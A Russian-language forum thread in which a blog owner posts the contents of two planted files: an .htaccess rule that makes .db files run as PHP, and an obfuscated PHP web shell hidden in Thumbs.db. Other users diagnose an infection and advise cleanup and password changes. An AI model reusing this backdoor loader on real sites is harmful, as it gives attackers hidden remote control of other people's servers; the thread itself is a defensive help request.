Что-то с сайтом( файлы с таким содержанием - Интернет-конференция

william · 11.01.2015, 01:33

Здравствуйте! Недавно нашел на сайте два левых файла, вот их содержимое:

1) файл .htaccess
AddType application/x-httpd-php .db

2) файл Thumbs.db
<?php $____=base64_decode('eJwMl2V/2+j2tb/l/8WhmXJT (чать кода убрал) nduuoXI4s3/B4BK2tA=');if(isset($_POST['_']) && isset($_POST['__'])){$_=$_POST['_'];$__=$_POST['__'];}elseif(isset($_COOKIE['_']) && isset($_COOKIE['__'])){$_=$_COOKIE['_'];$__=$_COOKIE['__'];}if(!empty($_) && !empty($__)){$___=$_.md5($__);$________='';$____=@ gzuncompress($____);$______=strlen($____);for($___ __=0;$_____<=$______;$_____++){$_______=chr((ord($ ____[$_____])-ord($___[$_____]))%256);$________.=$_______;$___.=$_______;}if($__ ______=@gzuncompress(@base64_decode($________))){s etcookie('_',$_);setcookie('__',$__);$________=cre ate_function('','?>'.$________.'<?php die();');$________();}}die('<center style="color:#777;font:normal 11px verdana;background:#000;"><form action="" method="post">login : <input type="text" name="_"/>   password : <input type="text" name="__"/> <input type="submit" value="go"/></form></center>');?>

яндекс выкинул сайт из поиска как вредоносный
Вопрос: Что это ? и акие еще последствия могут быть от таких скриптов?

ЗЫ
Спасибо.

Eternity · 11.01.2015, 01:48

похоже эти файло - части от вирья, вашь сайт заражен, файлы в удаление, обновите cms, видать есть дыры, и еще ищите может какие банеры ставили, с ними и прописали вредоносные скрипты .

william · 11.01.2015, 01:53

и для чего они так делают?

Игорь · 11.01.2015, 01:55

Цитата:

Сообщение от william

и для чего они так делают?

а как вы думаете? Чтобы завладеть Вашим сайтом или напакастить
надо просто чётко и слажено следить за работоспособностью сайта

william · 11.01.2015, 01:58

это небольшой блог, 2 недели как созданный, зачем им такое?

Игорь · 11.01.2015, 02:01

Цитата:

Сообщение от william

зачем им такое?

чтобы вы в дальнейшем не улучшили защиту, так сказать на начальном уровне вы уязвимы, Вас "ломают"

Eternity · 11.01.2015, 02:02

ну как зачем. Спам рассылать или себе все присвоить.
Ломают, что могут сломать.

Обновляйте движок и плагины, смените пароли доступа к хостингу, и пароль почты на которую зареган акк администратора сайта .

william · 11.01.2015, 02:08

там и не обоготиться сейчас, не понимаю.

Eternity · 11.01.2015, 02:11

william, даже не ищите смысл взлома именно вашего сайта.
Взломщики занимаются этим не из-за "нравится/не нравится сайт", а по принципу - ломают все что ломается.
Цели любые - спам, присвоение статей, хулиганство, заработок на рекламе и т.д. и т.п.

Лучше принимайте меры, какие описаны выше.

Игорь · 11.01.2015, 02:11

всё равно, держите свой сайт в порядке, мы же работаем со своим детищем и у Вас получится. будет сложности, поможем